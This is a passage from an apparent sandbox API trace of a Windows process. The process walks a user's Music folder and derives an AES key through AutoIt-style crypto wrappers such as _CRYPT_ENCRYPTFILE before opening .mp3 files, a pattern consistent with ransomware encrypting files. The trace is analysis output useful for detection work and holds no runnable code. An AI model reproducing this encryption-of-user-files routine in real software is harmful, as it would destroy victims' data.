lpString1="BjPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jPgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pgdhq.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0187.134] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.134] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0187.134] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0187.134] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0187.135] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0187.135] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.135] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.135] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.135] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0187.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.135] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84061af0, ftCreationTime.dwHighDateTime=0x1d5e3eb, ftLastAccessTime.dwLowDateTime=0x36fe5e90, ftLastAccessTime.dwHighDateTime=0x1d5da70, ftLastWriteTime.dwLowDateTime=0x36fe5e90, ftLastWriteTime.dwHighDateTime=0x1d5da70, nFileSizeHigh=0x0, nFileSizeLow=0x12af2, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="uvLMHuUMLBjPgdhq.mp3", cAlternateFileName="UVLMHU~1.MP3")) returned 0x90ae18 [0187.135] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.135] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.135] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.135] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.135] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0187.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.136] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.136] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.136] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.136] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.136] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0187.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.136] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.137] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.137] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.137] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.138] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.138] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.138] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.138] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.138] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.138] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.138] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.138] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.138] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.138] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.138] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.139] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.139] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.139] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.146] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.146] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.146] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.146] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.146] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.147] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0187.147] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.147] CryptDestroyHash (hHash=0x90af58) returned 1 [0187.147] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.147] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\uvlmhuumlbjpgdhq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.148] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.148] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.148] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0187.148] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0187.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.149] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.150] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4")) returned 0x10 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 